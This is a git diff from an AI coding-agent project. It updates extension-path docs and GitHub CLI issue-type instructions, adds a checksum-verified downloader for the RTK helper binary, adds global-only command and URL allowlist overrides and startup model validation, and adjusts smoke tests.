 
-Extensions must be in auto-discovery paths:
-- `~/.gsd/agent/extensions/*.ts`
-- `~/.gsd/agent/extensions/*/index.ts`
+Community extensions must be in auto-discovery paths:
+- `~/.pi/agent/extensions/*.ts`
+- `~/.pi/agent/extensions/*/index.ts`
 - `.gsd/extensions/*.ts`
 - `.gsd/extensions/*/index.ts`
 
+Note: `~/.gsd/agent/extensions/` is reserved for bundled extensions synced from the gsd-pi package.
+
 The file must `export default function(pi: ExtensionAPI) { ... }`.
 
 ## Step 4: Check for Common Mistakes
diff --git a/src/resources/skills/github-workflows/references/gh/SKILL.md b/src/resources/skills/github-workflows/references/gh/SKILL.md
index 2d1f4a53d..05d40f337 100644
--- a/src/resources/skills/github-workflows/references/gh/SKILL.md
+++ b/src/resources/skills/github-workflows/references/gh/SKILL.md
@@ -103,9 +103,12 @@ gh issue list -R gsd-build/gsd-2
 gh issue list -R gsd-build/gsd-2 --label "priority:p1" --state open
 
 # Create issue with labels and milestone
+# NOTE: Do NOT use labels for issue classification (bug, feature, etc.)
+# Use labels for metadata (priority, status, auto-generated) only.
+# Issue classification uses GitHub Issue Types, set via GraphQL after creation.
 gh issue create -R gsd-build/gsd-2 \
   --title "feat: add feature X" \
-  --label "priority:p1" --label "type:feature" \
+  --label "priority:p1" \
   --milestone "v1.0"
 
 # View issue
@@ -120,6 +123,24 @@ gh issue edit <number> -R gsd-build/gsd-2 \
   --remove-label "status:needs-grooming"
 ```
 
+### Issue Types (Classification)
+
+`gh issue create` has no `--type` flag. Issue types (Bug, Feature Request, etc.) are set via GraphQL after creation:
+
+```bash
+# Step 1: Create the issue (returns URL)
+ISSUE_URL=$(gh issue create -R gsd-build/gsd-2 \
+  --title "..." --body "...")
+
+# Step 2: Set the issue type via GraphQL
+ISSUE_NUM=$(echo "$ISSUE_URL" | grep -oE '[0-9]+$')
+ISSUE_ID=$(gh api graphql -f query='{ repository(owner:"gsd-build",name:"gsd-2") { issue(number:'"$ISSUE_NUM"') { id } } }' --jq '.data.repository.issue.id')
+TYPE_ID=$(gh api graphql -f query='{ repository(owner:"gsd-build",name:"gsd-2") { issueTypes(first:20) { nodes { id name } } } }' --jq '.data.repository.issueTypes.nodes[] | select(.name=="Bug") | .id')
+gh api graphql -f query='mutation { updateIssue(input:{id:"'"$ISSUE_ID"'",issueTypeId:"'"$TYPE_ID"'"}) { issue { number } } }'
+```
+
+Replace `"Bug"` with the appropriate type name (`"Feature Request"`, `"Task"`, etc.).
+
 ### Labels
 
 ```bash
diff --git a/src/rtk.ts b/src/rtk.ts
new file mode 100644
index 000000000..5c28ce756
--- /dev/null
+++ b/src/rtk.ts
@@ -0,0 +1,416 @@
+import { createHash, randomUUID } from "node:crypto";
+import { spawnSync } from "node:child_process";
+import { copyFileSync, existsSync, mkdirSync, readFileSync, rmSync, chmodSync, readdirSync } from "node:fs";
+import { createWriteStream } from "node:fs";
+import { arch as osArch, homedir as osHomedir } from "node:os";
+import { delimiter, join } from "node:path";
+import { Readable } from "node:stream";
+import { finished } from "node:stream/promises";
+import extractZip from "extract-zip";
+
+export const RTK_VERSION = "0.33.1";
+export const GSD_RTK_DISABLED_ENV = "GSD_RTK_DISABLED";
+export const GSD_SKIP_RTK_INSTALL_ENV = "GSD_SKIP_RTK_INSTALL";
+export const GSD_RTK_PATH_ENV = "GSD_RTK_PATH";
+export const RTK_TELEMETRY_DISABLED_ENV = "RTK_TELEMETRY_DISABLED";
+
+const RTK_REPO = "rtk-ai/rtk";
+const RTK_REWRITE_TIMEOUT_MS = 5_000;
+
+export interface EnsureRtkOptions {
+  targetDir?: string;
+  allowDownload?: boolean;
+  env?: NodeJS.ProcessEnv;
+  pathValue?: string;
+  releaseVersion?: string;
+  log?: (message: string) => void;
+}
+
+export interface EnsureRtkResult {
+  enabled: boolean;
+  supported: boolean;
+  available: boolean;
+  source: "disabled" | "unsupported" | "managed" | "system" | "downloaded" | "missing";
+  binaryPath?: string;
+  reason?: string;
+}
+
+function isTruthy(value: string | undefined): boolean {
+  if (!value) return false;
+  const normalized = value.trim().toLowerCase();
+  return normalized === "1" || normalized === "true" || normalized === "yes";
+}
+
+export function isRtkEnabled(env: NodeJS.ProcessEnv = process.env): boolean {
+  return !isTruthy(env[GSD_RTK_DISABLED_ENV]);
+}
+
+function resolveAppRoot(env: NodeJS.ProcessEnv = process.env): string {
+  return env.GSD_HOME || join(osHomedir(), ".gsd");
+}
+
+export function getManagedRtkDir(env: NodeJS.ProcessEnv = process.env): string {
+  return join(resolveAppRoot(env), "agent", "bin");
+}
+
+export function getRtkBinaryName(platform: NodeJS.Platform = process.platform): string {
+  return platform === "win32" ? "rtk.exe" : "rtk";
+}
+
+export function getManagedRtkPath(
+  platform: NodeJS.Platform = process.platform,
+  targetDir: string = getManagedRtkDir(),
+): string {
+  return join(targetDir, getRtkBinaryName(platform));
+}
+
+export function prependPathEntry(env: NodeJS.ProcessEnv, entry: string): NodeJS.ProcessEnv {
+  const pathKey = Object.keys(env).find((key) => key.toLowerCase() === "path") ?? (process.platform === "win32" ? "Path" : "PATH");
+  const currentPath = env[pathKey] ?? "";
+  const parts = currentPath.split(delimiter).filter(Boolean);
+  if (!parts.includes(entry)) {
+    env[pathKey] = [entry, currentPath].filter(Boolean).join(delimiter);
+  }
+  return env;
+}
+
+export function applyRtkProcessEnv(env: NodeJS.ProcessEnv = process.env): NodeJS.ProcessEnv {
+  prependPathEntry(env, getManagedRtkDir(env));
+  env[RTK_TELEMETRY_DISABLED_ENV] = "1";
+  return env;
+}
+
+function getPathValue(env: NodeJS.ProcessEnv): string | undefined {
+  const pathKey = Object.keys(env).find((key) => key.toLowerCase() === "path");
+  return pathKey ? env[pathKey] : env.PATH;
+}
+
+export function buildRtkEnv(env: NodeJS.ProcessEnv = process.env): NodeJS.ProcessEnv {
+  return applyRtkProcessEnv({ ...env });
+}
+
+export function resolveRtkAssetName(
+  platform: NodeJS.Platform,
+  arch: string,
+  version: string = RTK_VERSION,
+): string | null {
+  void version;
+  if (platform === "darwin" && arch === "arm64") return "rtk-aarch64-apple-darwin.tar.gz";
+  if (platform === "darwin" && arch === "x64") return "rtk-x86_64-apple-darwin.tar.gz";
+  if (platform === "linux" && arch === "arm64") return "rtk-aarch64-unknown-linux-gnu.tar.gz";
+  if (platform === "linux" && arch === "x64") return "rtk-x86_64-unknown-linux-musl.tar.gz";
+  if (platform === "win32" && arch === "x64") return "rtk-x86_64-pc-windows-msvc.zip";
+  return null;
+}
+
+function getReleaseBaseUrl(version: string): string {
+  return `https://github.com/${RTK_REPO}/releases/download/v${version}`;
+}
+
+function getChecksumsUrl(version: string): string {
+  return `${getReleaseBaseUrl(version)}/checksums.txt`;
+}
+
+function buildAssetUrl(version: string, assetName: string): string {
+  return `${getReleaseBaseUrl(version)}/${assetName}`;
+}
+
+function parseChecksums(content: string): Map<string, string> {
+  const checksums = new Map<string, string>();
+  for (const rawLine of content.split(/\r?\n/)) {
+    const line = rawLine.trim();
+    if (!line) continue;
+    const match = line.match(/^([a-f0-9]{64})\s+(.+)$/i);
+    if (!match) continue;
+    checksums.set(match[2], match[1].toLowerCase());
+  }
+  return checksums;
+}
+
+function sha256File(path: string): string {
+  const hash = createHash("sha256");
+  hash.update(readFileSync(path));
+  return hash.digest("hex");
+}
+
+async function downloadToFile(url: string, destination: string): Promise<void> {
+  const response = await fetch(url, {
+    headers: { "User-Agent": "gsd-pi-rtk" },
+  });
+
+  if (!response.ok) {
+    throw new Error(`download failed (${response.status}) for ${url}`);
+  }
+  if (!response.body) {
+    throw new Error(`download returned no body for ${url}`);
+  }
+
+  const output = createWriteStream(destination);
+  await finished(Readable.fromWeb(response.body as never).pipe(output));
+}
+
+function findBinaryRecursively(rootDir: string, binaryName: string): string | null {
+  const stack: string[] = [rootDir];
+  while (stack.length > 0) {
+    const current = stack.pop();
+    if (!current) continue;
+    const entries = readdirSync(current, { withFileTypes: true });
+    for (const entry of entries) {
+      const fullPath = join(current, entry.name);
+      if (entry.isFile() && entry.name === binaryName) {
+        return fullPath;
+      }
+      if (entry.isDirectory()) {
+        stack.push(fullPath);
+      }
+    }
+  }
+  return null;
+}
+
+function extractArchive(assetName: string, archivePath: string, extractDir: string): void {
+  if (!assetName.endsWith(".tar.gz")) {
+    throw new Error(`unsupported RTK archive format: ${assetName}`);
+  }
+
+  mkdirSync(extractDir, { recursive: true });
+  const result = spawnSync("tar", ["xzf", archivePath, "-C", extractDir], {
+    encoding: "utf-8",
+    timeout: 30_000,
+  });
+  if (result.error || result.status !== 0) {
+    throw new Error(result.error?.message ?? result.stderr?.trim() ?? `tar extraction failed for ${assetName}`);
+  }
+}
+
+async function extractArchiveAsync(assetName: string, archivePath: string, extractDir: string): Promise<void> {
+  if (assetName.endsWith(".zip")) {
+    mkdirSync(extractDir, { recursive: true });
+    await extractZip(archivePath, { dir: extractDir });
+    return;
+  }
+  extractArchive(assetName, archivePath, extractDir);
+}
+
+function resolvePathCandidates(pathValue: string | undefined): string[] {
+  if (!pathValue) return [];
+  return pathValue
+    .split(delimiter)
+    .map((part) => part.trim())
+    .filter(Boolean);
+}
+
+function resolveSystemRtkPath(pathValue: string | undefined, platform: NodeJS.Platform = process.platform): string | null {
+  const candidates = platform === "win32"
+    ? ["rtk.exe", "rtk.cmd", "rtk.bat", "rtk"]
+    : ["rtk"];
+
+  for (const dir of resolvePathCandidates(pathValue)) {
+    for (const candidate of candidates) {
+      const fullPath = join(dir, candidate);
+      if (existsSync(fullPath)) {
+        return fullPath;
+      }
+    }
+  }
+
+  return null;
+}
+
+export interface ResolveRtkBinaryPathOptions {
+  binaryPath?: string;
+  env?: NodeJS.ProcessEnv;
+  pathValue?: string;
+  platform?: NodeJS.Platform;
+  targetDir?: string;
+}
+
+export function resolveRtkBinaryPath(options: ResolveRtkBinaryPathOptions = {}): string | null {
+  const env = options.env ?? process.env;
+  const platform = options.platform ?? process.platform;
+
+  if (options.binaryPath) return options.binaryPath;
+  const explicitPath = env[GSD_RTK_PATH_ENV];
+  if (explicitPath && existsSync(explicitPath)) {
+    return explicitPath;
+  }
+
+  const managedPath = getManagedRtkPath(platform, options.targetDir ?? getManagedRtkDir(env));
+  if (existsSync(managedPath)) {
+    return managedPath;
+  }
+  // On Windows, also check for rtk.cmd in the managed dir (used by test fake RTK
+  // and any wrapper-style installs where a .cmd launcher accompanies the binary).
+  if (platform === "win32") {
+    const managedDir = options.targetDir ?? getManagedRtkDir(env);
+    const managedCmd = join(managedDir, "rtk.cmd");
+    if (existsSync(managedCmd)) {
+      return managedCmd;
+    }
+  }
+
+  return resolveSystemRtkPath(options.pathValue ?? getPathValue(env), platform);
+}
+
+export interface RewriteCommandOptions {
+  binaryPath?: string;
+  env?: NodeJS.ProcessEnv;
+  timeoutMs?: number;
+  spawnSyncImpl?: typeof spawnSync;
+}
+
+export function rewriteCommandWithRtk(command: string, options: RewriteCommandOptions = {}): string {
+  if (!command.trim()) return command;
+  if (!isRtkEnabled(options.env ?? process.env)) return command;
+
+  const env = options.env ?? process.env;
+  const binaryPath = resolveRtkBinaryPath({
+    env,
+    binaryPath: options.binaryPath,
+  });
+
+  if (!binaryPath) return command;
+
+  const run = options.spawnSyncImpl ?? spawnSync;
+  const result = run(binaryPath, ["rewrite", command], {
+    encoding: "utf-8",
+    env: buildRtkEnv(options.env ?? process.env),
+    stdio: ["ignore", "pipe", "ignore"],
+    timeout: options.timeoutMs ?? RTK_REWRITE_TIMEOUT_MS,
+    // .cmd/.bat wrappers (used by fake-rtk in tests) require shell:true on Windows
+    shell: /\.(cmd|bat)$/i.test(binaryPath),
+  });
+
+  if (result.error) return command;
+  if (result.status !== 0 && result.status !== 3) return command;
+
+  const rewritten = (result.stdout ?? "").trimEnd();
+  return rewritten || command;
+}
+
+export interface ValidateRtkBinaryOptions {
+  spawnSyncImpl?: typeof spawnSync;
+  env?: NodeJS.ProcessEnv;
+}
+
+export function validateRtkBinary(binaryPath: string, options: ValidateRtkBinaryOptions = {}): boolean {
+  const run = options.spawnSyncImpl ?? spawnSync;
+  const result = run(binaryPath, ["rewrite", "git status"], {
+    encoding: "utf-8",
+    env: buildRtkEnv(options.env ?? process.env),
+    stdio: ["ignore", "pipe", "ignore"],
+    timeout: RTK_REWRITE_TIMEOUT_MS,
+  });
+
+  if (result.error) return false;
+  if (result.status !== 0) return false;
+  return (result.stdout ?? "").trim() === "rtk git status";
+}
+
+export async function ensureRtkAvailable(options: EnsureRtkOptions = {}): Promise<EnsureRtkResult> {
+  const env = options.env ?? process.env;
+  if (!isRtkEnabled(env)) {
+    return { enabled: false, supported: true, available: false, source: "disabled", reason: `${GSD_RTK_DISABLED_ENV} is set` };
+  }
+  if (isTruthy(env[GSD_SKIP_RTK_INSTALL_ENV])) {
+    const configuredPath = env[GSD_RTK_PATH_ENV];
+    if (configuredPath && existsSync(configuredPath)) {
+      return { enabled: true, supported: true, available: true, source: "managed", binaryPath: configuredPath };
+    }
+    return { enabled: true, supported: true, available: false, source: "missing", reason: `${GSD_SKIP_RTK_INSTALL_ENV} is set` };
+  }
+
+  const targetDir = options.targetDir ?? getManagedRtkDir(env);
+  const managedPath = getManagedRtkPath(process.platform, targetDir);
+
+  if (existsSync(managedPath) && validateRtkBinary(managedPath, { env })) {
+    return { enabled: true, supported: true, available: true, source: "managed", binaryPath: managedPath };
+  }
+
+  const systemPath = resolveSystemRtkPath(options.pathValue ?? getPathValue(env));
+  if (systemPath && validateRtkBinary(systemPath, { env })) {
+    return { enabled: true, supported: true, available: true, source: "system", binaryPath: systemPath };
+  }
+
+  const version = options.releaseVersion ?? RTK_VERSION;
+  const assetName = resolveRtkAssetName(process.platform, osArch(), version);
+  if (!assetName) {
+    return {
+      enabled: true,
+      supported: false,
+      available: false,
+      source: "unsupported",
+      reason: `RTK release asset unavailable for ${process.platform}/${osArch()}`,
+    };
+  }
+
+  if (options.allowDownload === false) {
+    return { enabled: true, supported: true, available: false, source: "missing", reason: "download disabled" };
+  }
+
+  mkdirSync(targetDir, { recursive: true });
+
+  const tempRoot = join(targetDir, `.rtk-install-${randomUUID().slice(0, 8)}`);
+  const archivePath = join(tempRoot, assetName);
+  const extractDir = join(tempRoot, "extract");
+
+  mkdirSync(tempRoot, { recursive: true });
+
+  try {
+    const checksumsUrl = getChecksumsUrl(version);
+    const checksumsResponse = await fetch(checksumsUrl, { headers: { "User-Agent": "gsd-pi-rtk" } });
+    if (!checksumsResponse.ok) {
+      throw new Error(`failed to fetch RTK checksums (${checksumsResponse.status})`);
+    }
+    const checksums = parseChecksums(await checksumsResponse.text());
+    const expectedSha = checksums.get(assetName);
+    if (!expectedSha) {
+      throw new Error(`missing checksum for ${assetName}`);
+    }
+
+    await downloadToFile(buildAssetUrl(version, assetName), archivePath);
+    const actualSha = sha256File(archivePath);
+    if (actualSha !== expectedSha) {
+      throw new Error(`checksum mismatch for ${assetName}`);
+    }
+
+    await extractArchiveAsync(assetName, archivePath, extractDir);
+    const extractedBinary = findBinaryRecursively(extractDir, getRtkBinaryName(process.platform));
+    if (!extractedBinary) {
+      throw new Error(`RTK binary not found in ${assetName}`);
+    }
+
+    copyFileSync(extractedBinary, managedPath);
+    if (process.platform !== "win32") {
+      chmodSync(managedPath, 0o755);
+    }
+
+    if (!validateRtkBinary(managedPath, { env })) {
+      rmSync(managedPath, { force: true });
+      throw new Error("downloaded RTK binary failed validation");
+    }
+
+    options.log?.(`installed RTK ${version} to ${managedPath}`);
+    return { enabled: true, supported: true, available: true, source: "downloaded", binaryPath: managedPath };
+  } catch (error) {
+    options.log?.(`RTK install skipped: ${error instanceof Error ? error.message : String(error)}`);
+    return {
+      enabled: true,
+      supported: true,
+      available: false,
+      source: "missing",
+      reason: error instanceof Error ? error.message : String(error),
+    };
+  } finally {
+    rmSync(tempRoot, { recursive: true, force: true });
+  }
+}
+
+export async function bootstrapRtk(options: EnsureRtkOptions = {}): Promise<EnsureRtkResult> {
+  const result = await ensureRtkAvailable(options);
+  applyRtkProcessEnv(process.env);
+  if (result.binaryPath) {
+    process.env[GSD_RTK_PATH_ENV] = result.binaryPath;
+  }
+  return result;
+}
diff --git a/src/security-overrides.ts b/src/security-overrides.ts
new file mode 100644
index 000000000..9a0609d6c
--- /dev/null
+++ b/src/security-overrides.ts
@@ -0,0 +1,42 @@
+/**
+ * Apply user-configured security overrides from global settings.json and env vars.
+ *
+ * Both overrides are global-only (not project-level) because the threat model is
+ * malicious project-level config in cloned repos. Global settings and env vars
+ * represent the user's own authority on their machine.
+ *
+ * Precedence: env var > settings.json > built-in defaults
+ */
+
+import { type SettingsManager, setAllowedCommandPrefixes } from '@gsd/pi-coding-agent'
+import { setFetchAllowedUrls } from './resources/extensions/search-the-web/url-utils.js'
+
+export function applySecurityOverrides(settingsManager: SettingsManager): void {
+  // --- Command prefix allowlist ---
+  const envPrefixes = process.env.GSD_ALLOWED_COMMAND_PREFIXES
+  if (envPrefixes) {
+    const prefixes = envPrefixes.split(',').map(s => s.trim()).filter(Boolean)
+    if (prefixes.length > 0) {
+      setAllowedCommandPrefixes(prefixes)
+    }
+  } else {
+    const settingsPrefixes = settingsManager.getAllowedCommandPrefixes()
+    if (settingsPrefixes && settingsPrefixes.length > 0) {
+      setAllowedCommandPrefixes(settingsPrefixes)
+    }
+  }
+
+  // --- Fetch URL allowlist (SSRF exemptions) ---
+  const envUrls = process.env.GSD_FETCH_ALLOWED_URLS
+  if (envUrls) {
+    const urls = envUrls.split(',').map(s => s.trim()).filter(Boolean)
+    if (urls.length > 0) {
+      setFetchAllowedUrls(urls)
+    }
+  } else {
+    const settingsUrls = settingsManager.getFetchAllowedUrls()
+    if (settingsUrls && settingsUrls.length > 0) {
+      setFetchAllowedUrls(settingsUrls)
+    }
+  }
+}
diff --git a/src/startup-model-validation.ts b/src/startup-model-validation.ts
new file mode 100644
index 000000000..1a4141f00
--- /dev/null
+++ b/src/startup-model-validation.ts
@@ -0,0 +1,78 @@
+/**
+ * Startup model validation — extracted from cli.ts so it can be called
+ * AFTER extensions register their models in the ModelRegistry.
+ *
+ * Before this extraction (bug #2626), the validation ran before
+ * createAgentSession(), meaning extension-provided models (e.g.
+ * claude-code/claude-sonnet-4-6) were not yet in the registry.
+ * configuredExists was always false for extension models, causing the
+ * user's valid choice to be silently overwritten with a built-in fallback.
+ */
+
+import { getPiDefaultModelAndProvider } from './pi-migration.js'
+
+interface MinimalModel {
+  provider: string
+  id: string
+}
+
+interface MinimalModelRegistry {
+  getAll(): MinimalModel[]
+  getAvailable(): MinimalModel[]
+}
+
+type ThinkingLevel = 'off' | 'minimal' | 'low' | 'medium' | 'high' | 'xhigh'
+
+interface MinimalSettingsManager {
+  getDefaultProvider(): string | undefined
+  getDefaultModel(): string | undefined
+  getDefaultThinkingLevel(): ThinkingLevel | undefined
+  setDefaultModelAndProvider(provider: string, modelId: string): void
+  setDefaultThinkingLevel(level: ThinkingLevel): void
+}
+
+/**
+ * Validate the configured default model against the registry.
+ *
+ * If the configured model exists in the registry, this is a no-op — the
+ * user's choice is preserved.  If it does not exist (stale settings from a
+ * prior install, or genuinely removed model), a fallback is selected and
+ * written to settings.
+ *
+ * IMPORTANT: Call this AFTER createAgentSession() so that extension-
+ * provided models have been registered in the ModelRegistry.
+ */
+export function validateConfiguredModel(
+  modelRegistry: MinimalModelRegistry,
+  settingsManager: MinimalSettingsManager,
+): void {
+  const configuredProvider = settingsManager.getDefaultProvider()
+  const configuredModel = settingsManager.getDefaultModel()
+  const allModels = modelRegistry.getAll()
+  const availableModels = modelRegistry.getAvailable()
+  const configuredExists = configuredProvider && configuredModel &&
+    allModels.some((m) => m.provider === configuredProvider && m.id === configuredModel)
+
+  if (!configuredModel || !configuredExists) {
+    // Model not configured at all, or removed from registry — pick a fallback.
+    // Only fires when the model is genuinely unknown (not just temporarily unavailable).
+    const piDefault = getPiDefaultModelAndProvider()
+    const preferred =
+      (piDefault
+        ? availableModels.find((m) => m.provider === piDefault.provider && m.id === piDefault.model)
+        : undefined) ||
+      availableModels.find((m) => m.provider === 'openai' && m.id === 'gpt-5.4') ||
+      availableModels.find((m) => m.provider === 'openai') ||
+      availableModels.find((m) => m.provider === 'anthropic' && m.id === 'claude-opus-4-6') ||
+      availableModels.find((m) => m.provider === 'anthropic' && m.id.includes('opus')) ||
+      availableModels.find((m) => m.provider === 'anthropic') ||
+      availableModels[0]
+    if (preferred) {
+      settingsManager.setDefaultModelAndProvider(preferred.provider, preferred.id)
+    }
+  }
+
+  if (settingsManager.getDefaultThinkingLevel() !== 'off' && !configuredExists) {
+    settingsManager.setDefaultThinkingLevel('off')
+  }
+}
diff --git a/src/tests/app-smoke.test.ts b/src/tests/app-smoke.test.ts
index abf1b582e..8a43d8cbb 100644
--- a/src/tests/app-smoke.test.ts
+++ b/src/tests/app-smoke.test.ts
@@ -34,7 +34,9 @@ function assertExtensionIndexExists(agentDir: string, extensionName: string): vo
 
 test("app-paths resolve to ~/.gsd/", async () => {
   const { appRoot, agentDir, sessionsDir, authFilePath } = await import("../app-paths.ts");
-  const home = process.env.HOME!;
+  // Use homedir() — process.env.HOME is undefined on Windows (uses USERPROFILE instead)
+  const { homedir } = await import("node:os");
+  const home = homedir();
 
   assert.equal(appRoot, join(home, ".gsd"), "appRoot is ~/.gsd/");
   assert.equal(agentDir, join(home, ".gsd", "agent"), "agentDir is ~/.gsd/agent/");
@@ -46,7 +48,7 @@ test("app-paths resolve to ~/.gsd/", async () => {
 // 2. loader env vars
 // ═══════════════════════════════════════════════════════════════════════════
 
-test("loader sets all 4 GSD_ env vars and PI_PACKAGE_DIR", async () => {
+test("loader sets all 4 GSD_ env vars and PI_PACKAGE_DIR", async (t) => {
   // Run loader in a subprocess that prints env vars and exits before TUI starts
   const script = `
     import { fileURLToPath } from 'url';
@@ -75,17 +77,18 @@ test("loader sets all 4 GSD_ env vars and PI_PACKAGE_DIR", async () => {
   const scriptPath = join(tmp, "check-env.ts");
   writeFileSync(scriptPath, script);
 
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
   try {
-    const output = execSync(
-      `node --experimental-strip-types -e "
-        process.chdir('${projectRoot}');
-        await import('./src/app-paths.ts');
-      " 2>&1`,
-      { encoding: "utf-8", cwd: projectRoot },
-    );
-    // If we got here without error, the import works
+  const output = execSync(
+    `node --experimental-strip-types -e "
+      process.chdir('${projectRoot}');
+      await import('./src/app-paths.ts');
+    " 2>&1`,
+    { encoding: "utf-8", cwd: projectRoot },
+  );
+  // If we got here without error, the import works
   } catch {
-    // Fine — we test the logic inline below
+  // Fine — we test the logic inline below
   }
 
   // Direct logic verification (no subprocess needed)
@@ -99,6 +102,9 @@ test("loader sets all 4 GSD_ env vars and PI_PACKAGE_DIR", async () => {
   assert.ok(loaderSrc.includes("GSD_BIN_PATH"), "loader sets GSD_BIN_PATH");
   assert.ok(loaderSrc.includes("GSD_WORKFLOW_PATH"), "loader sets GSD_WORKFLOW_PATH");
   assert.ok(loaderSrc.includes("GSD_BUNDLED_EXTENSION_PATHS"), "loader sets GSD_BUNDLED_EXTENSION_PATHS");
+  assert.ok(loaderSrc.includes("applyRtkProcessEnv"), "loader applies RTK environment bootstrap");
+  const rtkSrc = readFileSync(join(projectRoot, "src", "rtk.ts"), "utf-8");
+  assert.ok(rtkSrc.includes("RTK_TELEMETRY_DISABLED"), "RTK helper disables telemetry for managed sessions");
   assert.ok(loaderSrc.includes("serializeBundledExtensionPaths"), "loader uses shared bundled path serializer");
   assert.ok(loaderSrc.includes("join(delimiter)"), "loader uses platform delimiter for NODE_PATH");
 
@@ -112,99 +118,157 @@ test("loader sets all 4 GSD_ env vars and PI_PACKAGE_DIR", async () => {
   // extensions directory has discoverable entry points
   const { discoverExtensionEntryPaths } = await import("../extension-discovery.ts");
   const bundledExtensionsDir = join(projectRoot, existsSync(join(projectRoot, "dist", "resources"))
-    ? "dist" : "src", "resources", "extensions");
+  ? "dist" : "src", "resources", "extensions");
   const discovered = discoverExtensionEntryPaths(bundledExtensionsDir);
   assert.ok(discovered.length >= 10, `expected >=10 extensions, found ${discovered.length}`);
 
   // Spot-check that core extensions are discoverable
   const discoveredNames = discovered.map(p => {
-    const rel = p.slice(bundledExtensionsDir.length + 1);
-    return rel.split(/[\\/]/)[0].replace(/\.(?:ts|js)$/, "");
+  const rel = p.slice(bundledExtensionsDir.length + 1);
+  return rel.split(/[\\/]/)[0].replace(/\.(?:ts|js)$/, "");
   });
   for (const core of ["gsd", "bg-shell", "browser-tools", "subagent", "search-the-web"]) {
-    assert.ok(discoveredNames.includes(core), `core extension '${core}' is discoverable`);
+  assert.ok(discoveredNames.includes(core), `core extension '${core}' is discoverable`);
   }
 
   rmSync(tmp, { recursive: true, force: true });
 });
 
+// ═══════════════════════════════════════════════════════════════════════════
+// 2b. loader runtime dependency checks
+// ═══════════════════════════════════════════════════════════════════════════
+
+test("loader source contains Node version check with MIN_NODE_MAJOR", () => {
+  const loaderSrc = readFileSync(join(projectRoot, "src", "loader.ts"), "utf-8");
+  assert.ok(loaderSrc.includes("MIN_NODE_MAJOR"), "loader defines MIN_NODE_MAJOR constant");
+  assert.ok(loaderSrc.includes("process.versions.node"), "loader checks process.versions.node");
+});
+
+test("loader source contains git availability check", () => {
+  const loaderSrc = readFileSync(join(projectRoot, "src", "loader.ts"), "utf-8");
+  assert.ok(loaderSrc.includes("git"), "loader checks for git");
+  assert.ok(loaderSrc.includes("execFileSync"), "loader uses execFileSync for git check");
+});
+
+test("loader exits with error on unsupported Node version", () => {
+  // Spawn a subprocess that simulates the loader's version check logic
+  // with a deliberately high minimum to force the failure path
+  const script = [
+    "const major = parseInt(process.versions.node.split('.')[0], 10);",
+    "const MIN = 99;",
+    "if (major < MIN) { process.stderr.write('WOULD_EXIT'); process.exit(1); }",
+    "process.stdout.write('OK');",
+  ].join(" ");
+  try {
+    execSync(`node -e "${script}"`, { encoding: "utf-8", stdio: "pipe" });
+    // Node >= 99 would reach here — acceptable no-op
+  } catch (err: unknown) {
+    const e = err as { status?: number; stderr?: string };
+    assert.strictEqual(e.status, 1, "exits with code 1 for unsupported Node");
+    assert.ok((e.stderr || "").includes("WOULD_EXIT"), "stderr contains version error");
+  }
+});
+
+test("loader MIN_NODE_MAJOR matches package.json engines field", () => {
+  const loaderSrc = readFileSync(join(projectRoot, "src", "loader.ts"), "utf-8");
+  const pkg = JSON.parse(readFileSync(join(projectRoot, "package.json"), "utf-8"));
+
+  // Extract MIN_NODE_MAJOR value from loader source
+  const match = loaderSrc.match(/MIN_NODE_MAJOR\s*=\s*(\d+)/);
+  assert.ok(match, "MIN_NODE_MAJOR is defined with a numeric value");
+  const loaderMin = parseInt(match![1], 10);
+
+  // Extract major version from engines.node (e.g. ">=22.0.0" → 22)
+  const engineMatch = (pkg.engines?.node || "").match(/(\d+)/);
+  assert.ok(engineMatch, "package.json engines.node is defined");
+  const engineMin = parseInt(engineMatch![1], 10);
+
+  assert.strictEqual(loaderMin, engineMin,
+    `loader MIN_NODE_MAJOR (${loaderMin}) must match package.json engines.node (>=${engineMin}.0.0)`);
+});
+
+test("cli.ts lets gsd update bypass the managed-resource mismatch gate", () => {
+  const cliSrc = readFileSync(join(projectRoot, "src", "cli.ts"), "utf-8");
+  const updateBranchIndex = cliSrc.indexOf("if (cliFlags.messages[0] === 'update')")
+  const mismatchGateIndex = cliSrc.indexOf("exitIfManagedResourcesAreNewer(agentDir)")
+
+  assert.ok(updateBranchIndex !== -1, "cli.ts contains an update branch")
+  assert.ok(mismatchGateIndex !== -1, "cli.ts contains the managed-resource mismatch gate")
+  assert.ok(
+    updateBranchIndex < mismatchGateIndex,
+    "gsd update must run before the managed-resource mismatch gate",
+  )
+});
+
 // ═══════════════════════════════════════════════════════════════════════════
 // 3. resource-loader syncs bundled resources
 // ═══════════════════════════════════════════════════════════════════════════
 
-test("initResources syncs extensions, agents, and skills to target dir", async () => {
+test("initResources syncs extensions, agents, and skills to target dir", async (t) => {
   const { initResources, readManagedResourceVersion } = await import("../resource-loader.ts");
   const tmp = mkdtempSync(join(tmpdir(), "gsd-resources-test-"));
   const fakeAgentDir = join(tmp, "agent");
 
-  try {
-    initResources(fakeAgentDir);
+  initResources(fakeAgentDir);
 
-    // Extensions synced
-    assertExtensionIndexExists(fakeAgentDir, "gsd");
-    assertExtensionIndexExists(fakeAgentDir, "browser-tools");
-    assertExtensionIndexExists(fakeAgentDir, "search-the-web");
-    assertExtensionIndexExists(fakeAgentDir, "context7");
-    assertExtensionIndexExists(fakeAgentDir, "subagent");
+  // Extensions synced
+  assertExtensionIndexExists(fakeAgentDir, "gsd");
+  assertExtensionIndexExists(fakeAgentDir, "browser-tools");
+  assertExtensionIndexExists(fakeAgentDir, "search-the-web");
+  assertExtensionIndexExists(fakeAgentDir, "context7");
+  assertExtensionIndexExists(fakeAgentDir, "subagent");
 
-    // Agents synced
-    assert.ok(existsSync(join(fakeAgentDir, "agents", "scout.md")), "scout agent synced");
+  // Agents synced
+  assert.ok(existsSync(join(fakeAgentDir, "agents", "scout.md")), "scout agent synced");
 
-    // Skills synced
-    assert.ok(existsSync(join(fakeAgentDir, "skills")), "skills directory synced");
+  // Skills are NOT synced here — they use ~/.agents/skills/ via skills.sh
 
-    // Version manifest synced
-    const managedVersion = readManagedResourceVersion(fakeAgentDir);
-    assert.ok(managedVersion, "managed resource version written");
+  // Version manifest synced
+  const managedVersion = readManagedResourceVersion(fakeAgentDir);
+  assert.ok(managedVersion, "managed resource version written");
 
-    // Idempotent: run again, no crash
-    initResources(fakeAgentDir);
-    assertExtensionIndexExists(fakeAgentDir, "gsd");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  // Idempotent: run again, no crash
+  initResources(fakeAgentDir);
